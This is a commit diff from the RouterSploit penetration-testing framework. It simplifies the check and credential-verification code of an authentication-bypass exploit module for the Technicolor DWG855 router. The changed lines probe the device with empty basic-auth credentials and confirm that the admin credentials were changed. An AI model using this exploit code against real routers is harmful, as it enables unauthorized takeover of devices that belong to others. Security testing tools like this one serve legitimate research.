Simplified check and exploit.

All is simpler now :)

Simplified check and exploit.
All is simpler now :)
5858251b · John Mora · 982d99f4 · 5858251b
Commit 5858251b authored Feb 19, 2017 by John Mora
Hide whitespace changes
Inline Side-by-side

Showing with 2 additions and 16 deletions

dwg855_authbypass.py ...rsploit/modules/exploits/technicolor/dwg855_authbypass.py +2 -16

No files found.
--- a/routersploit/modules/exploits/technicolor/dwg855_authbypass.py
+++ b/routersploit/modules/exploits/technicolor/dwg855_authbypass.py
@@ -54,14 +54,7 @@ class Exploit(exploits.Exploit):
            elif response.status_code == 401:
                #Server obeys request but then sends unauthorized response. Here we send a GET request with the new creds.
                infotab_url = sanitize_url("{}:{}/RgSwInfo.asp".format(self.target, self.port))
-                user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
-                chekc_headers = {'User-Agent': user_agent,
-                           'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
-                           'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
-                           'Connection': 'keep-alive',
-                           'Accept-Encoding': 'gzip, deflate',
-                           'Authorization': base64.b64encode(self.nuser+":"+self.npass)}
-                check_response = http_request(method="GET", url=infotab_url, headers=chekc_headers)
+                check_response = http_request(method="GET", url=infotab_url, auth=(self.nuser, self.npass))

                if check_response.status_code == 200:
                    print_success("Credentials changed!")
@@ -78,14 +71,7 @@ class Exploit(exploits.Exploit):
    def check(self):
        url = sanitize_url("{}:{}/logo.jpg".format(self.target, self.port))
        user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
-        headers = {'User-Agent': user_agent,
-                   'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
-                   'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
-                   'Connection': 'keep-alive',
-                   'Accept-Encoding': 'gzip, deflate',
-                   'Authorization': base64.b64encode(":")}
-
-        response = http_request(method="GET", url=url, headers=headers)
+        response = http_request(method="GET", url=url, auth=("", ""))
        #print response.text.encode('utf-8')
        if response is not None and self.vulnresp in response.text.encode('utf-8'):
            return True